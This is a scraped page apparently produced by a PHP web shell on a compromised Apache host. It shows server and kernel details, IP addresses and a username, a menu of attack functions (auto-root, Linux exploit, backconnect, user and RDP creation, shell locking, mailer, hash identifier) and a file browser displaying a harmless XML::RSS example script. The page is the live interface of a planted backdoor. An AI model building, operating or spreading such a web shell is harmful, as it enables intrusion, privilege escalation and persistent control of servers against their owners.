Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.53
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libxml-rss-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
0.9
[ DIR ]
drwxr-xr-x
0.91
[ DIR ]
drwxr-xr-x
1.0
[ DIR ]
drwxr-xr-x
2.0
[ DIR ]
drwxr-xr-x
README
164
B
-rw-r--r--
convert.pl
569
B
-rw-r--r--
create_rss_multiple.pl
1.87
KB
-rw-r--r--
rss2html.pl
2.6
KB
-rw-r--r--
rss_info.pl
658
B
-rw-r--r--
update_rss.pl
407
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update_rss.pl
#!/usr/bin/perl # update_rss.pl # Adds a new item to the RSS file use strict; use warnings; use XML::RSS (); die "Syntax: update_rss.pl source.rdf destination.rdf\n\n" unless @ARGV == 2; my $rss = XML::RSS->new; $rss->parsefile(shift); $rss->add_item(title => "MpegTV Player (mtv) 1.0.9.7", link => "http://freshmeat.net/news/1999/06/21/930003958.html", mode => 'insert' ); $rss->save(shift);
Close